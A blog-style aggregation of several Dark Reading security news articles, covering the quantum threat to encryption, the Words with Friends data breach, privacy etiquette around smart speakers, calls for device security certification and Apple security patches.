STE WILLIAMS

The Information Age replaced industrial equipment with data. Today, data isn’t just information; it’s process and interaction. Software commands robots to build things in factories. Sensors in fields trigger watering when crops are too dry. Code runs power plants. We’re developing smart cars and smart cities. And it’s all connected to the Internet — the Internet of Things.

But with this progress comes a pitfall: the opportunity for nation-state hackers to beat even our best cybersecurity systems and steal everything from source code to aeronautical blueprints, and have the ability to damage into the physical world as never before.

Attackers constantly find their way into sensitive networks around the globe. Hackers working for China, Russia, Iran, North Korea, and other nations are doing reconnaissance, stealing data, and hiding backdoors and malware in the networks of US agencies and military contractors, nuclear power plants and dams, banks, and Nasdaq. Russia shut down the Ukraine electric grid two years in a row. The US allegedly attacked Russia’s electric power grid, and a decade ago Stuxnet crippled Iran’s nuclear program. These attacks have affected people’s lives — such as turning Ukrainian cities dark for days. Not only do such attacks put sensitive data and intellectual property at risk, but the chances of an attack that could shut down systems that citizens rely on to survive are only increasing.  

In the cat-and-mouse game between cybersecurity and cybercriminals (nation-state or otherwise), a game-changer is in the near future: quantum computing, which is potentially capable of cracking even the most advanced conventional encryption. The US and China are in a heated race to develop quantum computing, which will revolutionize the industry, particularly in the fields of artificial intelligence, medicine, and scientific modeling.

Alongside these benefits is a danger from quantum computing that most people don’t realize is here, now, even though the quantum computers aren’t ready yet. This is because encrypted information stolen by China from the US government and industry is being stockpiled by China. Cheap data storage and the proliferation of valuable data online increases the feasibility and incentive for long-term storage of even the most solidly encrypted data. This offensive strategy is known as a harvesting attack. Encryption protects everything from classified data to the operations of power plants, water supplies, and financial trading systems. Once quantum computers are available, not only will the most critical data be exposed, but quantum-powered attacks will be able to interfere with important cyber-controlled processes as well. Cloaked secrets will be revealed and physical equipment will be manipulated remotely. 

We Need to Get Moving
It may be too late for much of the data that’s already been intercepted, but we can work to protect more of our data going forward — but only if the government takes this threat seriously.

The National Quantum Initiative Act (NQIA), which was signed into law in December, commits $1.2 billion to fund quantum science and computing efforts over five years to be divided between the National Institute of Standards and Technology (NIST), the Department of Energy (DoE), and the National Science Foundation. None of the money has yet been appropriated. Meanwhile, China is building a $10 billion quantum research lab that is slated to open next year.

The US needs to move quickly and invest in tech companies and startups that aren’t hampered by bureaucracy and are efficient with go-to-market strategies. It can take a decade or more to get research from the lab to the market. The Defense Advanced Research Projects Agency within the DoE has provided grants to independent cybersecurity researchers and startups to develop defenses for smart car security, voting machines, and other areas. Given the implications of crypto-breaking quantum computers for the defense industry, it makes sense for it to fund quantum defense as well.

A number of universities are doing important research and development of quantum computing, including MIT, Harvard, the University of Chicago, the University of Waterloo in Canada, and the University of Cambridge in England. NIST is working on post-quantum cryptography designed to protect against quantum computer attacks. And the DoE is doing great research at Oak Ridge National Laboratory on the use of quantum computing to protect the electric grid, which is potentially the biggest risk we face in a post-quantum world. But we need more researchers tackling all the various problems from more of the best minds and labs around the country. Once the NQIA funding is appropriated some grant money will flow to universities, but it will only be a piece of the overall $1.2 billion. Whatever it is, it needs to be more.

There are some quantum efforts that are in operation today, but they involve hardware as opposed to cryptographic algorithms, which can be broken. The Swiss government has been protecting its national elections with quantum key distribution (QKD), a quantum-based method for preventing the interception of encryption keys, for 12 years. However, here too, China is ahead — with a 2,000-kilometer QKD fiber network and a quantum science satellite that was launched in 2016.

Given what’s at stake — and the stockpiles of stolen information already sitting in foreign databases that will be exposed the minute there’s a working quantum computer — we don’t have time to spare. That is estimated to be five to ten years away, and the quantum clock is ticking.

Related Content:

• Quantum Computing and Code-Breaking
• Start Preparing Now for the Post-Quantum Future
• Cryptography the Hype Over Quantum Computing
• Post-Quantum Crypto Standards Aren’t All About the Math

Throughout his 30-year career, John Prisco has demonstrated success driving revenue growth, implementing operational excellence, and bringing companies such as Triumfant, GeoVantage, and Ridgeway Systems to successful exits. His depth of experience in telecommunications, … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/harvesting-attacks-and-the-quantum-revolution/a/d-id/1335870?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A cybercriminal operating under the alias Gnosticplayers has broken into the Words with Friends database and gained access to 218 million player records, The Hacker News reports.

The popular puzzle game is owned by Zynga, one of the biggest names in the social gaming market with other well-known offerings, including FarmVille, Mafia Wars, and Zynga Poker. Zynga issued a disclosure on September 12 to say some player data may have been obtained by unauthorized parties; now, a new report sheds light on the extent of the security incident.

Gnosticplayers, the same cybercriminal also reportedly behind the Collection #1 and Collection #2 data dumps earlier this year, told The Hacker News he was able to breach a Words with Friends database containing more than 218 million user records. The incident affects players using iOS and Android devices who installed and registered for the game on or before September 2.

A sample of the stolen data revealed the range of user data exposed: names, email addresses, login IDs, hashed and salted passwords, requested password reset tokens, provided phone numbers, Facebook ID if the user had connected, and Zynga account ID, the report states.

The attacker also claims to have accessed information belonging to 7 million players of the also-popular Draw Something game, as well as a game called OMGPOP that is discontinued, The Hacker News found. Exposed data included plaintext passwords.

Read more details here.

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “The Etiquette of Respecting Privacy in the Age of IoT.”

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/218m-words-with-friends-players-compromised-in-data-breach/d/d-id/1335948?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Her polite robotic voice pipes up in the background, followed by a giggling human apology. So sorry, that was Alexa responding to something one of us said on the conference call. I’ll go on mute.’ Those of us on the line, who’ve been placed on speakerphone, will no longer hear Alexa (or Siri, or Google)…but, of course, she’ll still hear us. 

Some chuckle, and bond over anecdotes about the foibles of their voice-activated digital assistants, just like they do about their toddlers’.

Other people are like me. We scowl and grind our teeth.

We think about privacy violations and security vulnerabilities. Like the couple whose conversation was recorded by an Amazon Echo and sent to a contact of theirs. Or the German Amazon customer whose Alexa recordings, which contained intimate “hair standing on end” personal details, were sent to a stranger. Or Amazon workers tapping into conversations, listening and recording for quality control purposes? Or researchers discovering vulnerabilities that would allow for “skill-squatting” (or voice-squatting) attacks that can turn legitimate commands into malicious executables. Or the vulnerable Google Nest, smart coffee pot or other unknown item that might be lurking in the background.

We wonder what things we might have said over the past 45 minutes, before we knew the recording device was stealthily listening. Did we mention anything sensitive or confidential? Anything that would violate privacy law if it were leaked? Anything that would help attackers write a good spearphishing message or guess our passwords? Or just say something stupid and embarrassing? 

What’s a grumpy, privacy-conscious person meant to do in these situations? Make angry demands, spiked with obscenities and snide comments about the foolishness of anyone who’d invite such spy equipment into their life? 

Well, that feels right. But just in case, it isn’t, I decided to consult an expert.  

An Etiquette ‘Gold Star’

In 1922, Emily Post wrote the first edition of Etiquette in Society in Business in Politics and at Home. Covering everything from weddings to precisely when and how a gentleman should lift his hat, the book made Post the unofficial arbiter of good manners in America.

Although Emily is no longer with us, the Emily Post Institute has carried on her legacy since 1946. Now led by her great-great-grandchildren Lizzie Post and Daniel Post Senning, the Institute is currently working on the 20th edition of Etiquette.   

Who better to consult about the etiquette of the Internet of Things than the family who has been the authority on etiquette for nearly 100 years?

So last Friday afternoon, sitting alone in my dumb home (not smart home), beside my laptop with the disabled microphone and covered webcam, I called Daniel Post Senning. I picked up my phone—which is equipped with a rose-printed carrying case, five security-related apps, and a dazzling array of no and don’t privacy settings—and dialed.

I asked if it he’d mind if I put him on speakerphone and record our conversation. I hit Record only after he gave his approval. 

“I am always curious where the next frontier is going to be in etiquette,” said Post Senning. “And this idea of privacy in a world where we’re all carrying these increasingly powerful recording devices both audio and visual … I think it’s a fascinating question.”

The Institute hasn’t yet written official guidance on the topic yet. (It might be coming in the 20th edition.)

“Whenever I’m in new territory, I always look back to tradition,” says Post Senning. “All the courtesies that survived around conference calls, video calls, using speaker phones, generally would apply in the scenarios where the ‘person’ listening isn’t necessarily a person, but might be artificial intelligence or a device that’s connected to the Internet, in the case of Alexa.”

Therefore, in professional situations like this, says Post Senning, “The idea of letting people know when they’re being recorded and who they’re being broadcast to are, for me, just core courtesies, no matter what technology you’re using.

“And it’s impossible to know every situation you walk into what combination of technology is going to be at play,” he says. “So I think the onus really falls on the person who’s chosen to deploy it in their home to warn others or to let other people know.”

If the owner of the technology fails to extend this courtesy, however, is it rude for a concerned (paranoid) house guest or colleague to ask, or even request they turn the device off?

The short answer, says Post Senning, is no. However, that depends on the way you ask. 

“There are kind and benevolent truths and there are harsh and brutal truths,” says Post Senning. “and if you had that conversation in a way that was accusatory or insulting or even just self-absorbed – ‘I can’t believe you have that device in your house, don’t you know that I don’t like to be listened to by evil tech giants’ – there’s a way to have that conversation that could be really offensive.”

(Baser impulses nearly drove me to such an offensive conversation. Post Senning gave me “an etiquette gold star” for resisting them.)

Reasonable Expectations

We scowling teeth-grinders must recognize too, that the world must not necessarily bend to our whims just because we asked nicely, and our needs are not the only ones that matter.

“Etiquette is most powerful when you’re using it as a tool for self-improvement, self-assessment,” says Post Senning.  

So, etiquette would tell a privacy-conscious guest in a smart-as-a-whip home to also consider carefully what you’re asking of your host. The inconvenience of turning a microphone off of one device might be small, but entirely altering the operation of an entire building (particularly if the homeowner requires voice activation for accessibility purposes) is a far greater inconvenience. “As the practical landscape changes,” says Post Senning, “the nature of the request and how you make it is going to change as well.” 

Nevertheless, “It’s hard to make demands of your host, as a guest. But you can make a request, and you can adjust your behavior and your participation accordingly,” says Post Senning. “‘Oh no we’re gonna leave that on? Well I’m just going to talk about things that are tier-1 conversation topics. We’re gonna talk about the weather and sports and pop culture now.’

“Or you say ‘maybe next time I’ll get myself an Air BB.'”

Another very practical piece of advice he gives is to get familiar with all the IoT and communications technology you use in the workplace, becausing using it well can protect your privacy. (Using it not-well might mean forgetting to hit “stop sharing my screen” before beginning an instant message conversation complaining about the people on the conference call.)   

Of course that would be less of an issue if we followed one of the oldest etiquette rules, going, Post Senning says, almost back to Emily’s time: “the headline rule.” The idea was that before you wrote something in a letter, ask yourself if you’d be okay with it becoming a newspaper headline; because even if you trusted the person you were sending the letter to, could you trust everyone else who might obtain access to it?

“As the question about not just what we write, but what we say and what we do becomes also potentially public and permanent,” says Senning, “I think it raises some really interesting questions about what privacy is and how we continue to value it and show value for it in the way we behave and make choices.”

Post Senning says the heart of all good etiquette is holding yourself accountable to standards of consideration, honesty and kindness. In that case, we all ought to practice it. Because if recording devices are going to capture our behavior no matter what we do, good etiquette is behavior we wouldn’t mind being caught. 

Sara Peters is Senior Editor at Dark Reading and formerly the editor-in-chief of Enterprise Efficiency. Prior that she was senior editor for the Computer Security Institute, writing and speaking about virtualization, identity management, cybersecurity law, and a myriad … View Full Bio

Article source: https://www.darkreading.com/edge/theedge/the-etiquette-of-respecting-privacy-in-the-age-of-iot/b/d-id/1335939?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

The case for certifying the cybersecurity of specific classes of devices is gaining momentum as cybersecurity professionals worry that the growing number of interdependencies between software, hardware, and online services, puts consumers and workers at risk.

This week, a group of 14 cybersecurity experts at the Supply Chain Security working group of the Cybersecurity Commission of ICTswitzerland called for that country’s government to work to establish a testing and certification authority for the nation. The group is not alone: In 2016, the Commission on Enhancing National Cybersecurity formed by the Obama Administration called for similar certification of consumer technology and the creation of a “nutrition label” to collect simple cybersecurity metrics. In addition, other testing initiatives—from NetSecOPEN to the Cyber ITL—are aiming to shed more light on a variety of classes of products. 

The Swiss cybersecurity group aims to test products, evaluate source code, and prevent the insertion of malicious code into critical devices and applications, says Stefan Frei, cybersecurity principal at Accenture and head of the supply chain security group at ICT Switzerland. 

“Looking at supply-chain security, [cybersecurity is] a huge problem—we deploy anything that is given us without thinking,” he says. “If those devices are already compromised … because we have more cyber-physical applications, the result of attacks on that infrastructure is physical harm.” 

IoT’s Influence

The latest call for cybersecurity certification of products comes as three technology trends are gaining steam. 

First, an increasing number of devices are becoming part of the Internet-of-things—embedded with a processor and connected to the Internet—expanding the attackable surface area of businesses and consumer households alike. There will be more than 25 billion connected devices in 2020, according to business intelligence firm Gartner.

Because more consumer appliances, such as TVs and refrigerators, and industrial devices such as machine controllers and environmental monitors are becoming “smart,” untested technology is also becoming embedded in many devices with long lifespans or use-cycles. Non-critical personal electronics typically are replaced every few years. Smartphones, for example, have the shortest lifespan, being replaced every three years on average, while desktop computers last five or six years, according to survey data from small-business IT information firm Spiceworks. Household appliances typically last 10 years and cars last 15 to 17 years on average.

Finally, the deployment of such connected technology into devices that can have a physical impact means that cyber-physical attacks are now a reality. An online attacker’s actions can have real-world consequences.

Because there has been little oversight of the technology incorporated into companies’ infrastructure and consumer households, the ICTswitzerland report argues that its likely that many organizations have already been compromised.  

“In the absence of a reliable quality inspection of digital products, we have to assume that compromised components are already in use today,” the group said. “Further compromised components will be added continuously, sometimes in critical functions.”

The group of cybersecurity professionals called for a non-profit testing firm, funded by the companies whose products it tests, to review source code and configurations, to analyze and reverse engineer, and to conduct risk assessments. All testing would be open and the results published. 

The certification authority would work even if it could not test every product, Frei says.

“You don’t need to test everything,” he says. “The police do not need to have radar at every intersection to prevent speeding. You just need periodic checks.”

‘Nutrition Labels’

The idea for creating a testing and certification center is not new. The Obama Administration’s Report on the President’s Commission on Enhancing National Cybersecurity included, among its recommendations, the creation of testing and certification groups that could produce cybersecurity “nutrition labels” to allow consumers to compare technology services and products. 

The current “lack of information leaves most consumers unaware of the risks associated with using technology products and services, how these risks might easily be reduced, or how competing products’ security characteristics compare with each other,” the report stated. “Making matters worse, security considerations increasingly may lead to safety concerns, as many Internet-enabled devices can affect the world physically.”

While a broad certification system for electronic devices has not been created yet, a number of private organizations and businesses have arisen to test the cybersecurity capabilities of certain classes of—mostly security—products. 

AV-Test and AV-Comparatives both test anti-virus products, while groups such as the ICSA Labs, UL Labs, and NSS Labs both do independent testing of broader classes of products. Because such groups typically may not have open methodologies, various industries have also created their own groups to either inform testing or set industry-approved standards for testing.

The Cellular Telecommunications Industry Association (CTIA), for example, maintains the CTIA’s Cybersecurity Certification Program for wireless devices, and the Anti-Malware Testing Standards Organization (AMTSO) sets industry-approved standards for testing antivirus products.

Related Content

• California’s IoT Security Law Causing Confusion
• Open Security Tests Gain Momentum With More Lab Partners
• MITRE Changes the Game in Security Product Testing
• Underwriters Laboratories To Launch Cyber Security Certification Program

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “The Beginner’s Guide to Denial-of-Service Attacks: A Breakdown of Shutdowns“

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Article source: https://www.darkreading.com/iot/cybersecurity-certification-in-the-spotlight-again-/d/d-id/1335940?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

On the heels of the upgrade to iOS 13, Apple has released a series of security updates to iOS, macOS, iPadOS, and watchOS. There are two separate updates, each addressing a specific vulnerability on multiple platforms.

The first update, released on Thursday, addresses an out-of-bounds memory read that might allow an attacker to execute arbitrary code on the target machine. This update affects a number of operating systems across several Apple platforms. Apple released updates designated macOS Mojave 10.14.6 Supplemental Update 2, Security Update 2019-005 High Sierra, and Security Update 2019-005 Sierra; watchOS 5.3.2; and iOS 12.4.2.

Today, Apple also released iOS 13.1.1 and iPadOS 13.1.1. These updates address errors in the “sandbox” that iOS and iPadOS use to limit the permissions and resources available to an app. Because of the error, third-party app extensions could run with the wrong permissions, gaining access to resources they should not have been able to reach.

For more, read here.

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Why Clouds Keep Leaking Data.”

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/apple-patches-multiple-vulnerabilities-across-platforms/d/d-id/1335941?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple